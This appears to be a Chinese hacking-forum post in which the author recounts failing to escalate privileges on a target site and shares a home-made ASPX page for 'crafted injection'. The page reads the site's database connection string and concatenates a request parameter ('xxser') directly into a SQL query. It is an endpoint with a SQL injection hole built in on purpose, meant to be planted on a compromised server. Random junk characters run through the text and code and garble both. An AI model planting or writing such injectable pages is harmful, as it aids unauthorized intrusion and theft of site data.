昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
8 E `3 R' ~. r- ]其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
) F0 N/ [5 q8 A V6 n1 H& W代码量不多,自己写个拉倒了。烦死了。# r. Z& c( A o9 \& O" L [
% x4 j, P. S; K2 y6 N7 E, y: S
+ G1 n- _3 G# Z- r" R: b
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
$ i# v; v4 ~: q7 c+ Q$ X7 T8 ?' q<html xmlns="http://www.w3.org/1999/xhtml">/ r4 D$ O x! a' y- X
<head runat="server">7 l& H% ]! W: f6 f. A+ ~
<title>暗影aspx构造注射专用页面</title>8 r2 h* d. M: {+ W( b
</head>; N$ F& v: y' ]) q) ^3 l0 y
<body>4 h4 @1 R3 q$ `2 a$ i; F, }
<form id="form1" runat="server">
1 d2 F( Y0 p4 P9 p# \5 O <div>; o5 Y& G! I& T( v! h. e5 a
<script language="c#" runat="server">
. k( V% m* ]) p3 n3 t) u+ r1 X4 B
, x2 H6 R7 q+ }4 w void page_init(object sender, EventArgs e)
6 k4 a3 X3 h) ` {1 h; B4 {- R+ [) Z
8 E$ d6 r) l3 U/ v
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();# `) P# Z+ l- O/ ~) E
' S6 P+ m$ t! h, L. P- u2 Q
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();5 n6 f3 d+ ~0 v6 O- w6 f
conn.Open();( K! {3 q% C* x+ S# i* j
6 g# N% A1 B. q9 z/ M p string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1, s0 U+ t3 w$ t
4 w: K6 o( `0 h
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);" n; c. K0 F5 g+ ^; r" y$ D
int x = command.ExecuteNonQuery();
4 |$ _3 ]* U+ s8 _8 P$ l# f) C Response.Write(i+"\n");( k+ X9 ~ F- K( w( z7 ~+ `& P+ c
Response.Write(x);
; }. A- v9 s1 i0 N/ Z$ G conn.Close();
4 J& Z. }8 J" U/ {; C0 F }* Y- h& M- V7 w( v# t0 `) d
& @) P% \& Y% Y2 C
</script>7 ~- e( X! Y" z C7 X
</div>
: u! W) ^0 r3 _- q0 g- n" b </form>4 W, o; u# G0 H9 d. k. \" K
</body>/ x% J; {- P- W8 O
</html>9 o' z5 |3 K: {% R8 p8 Q( s' z
|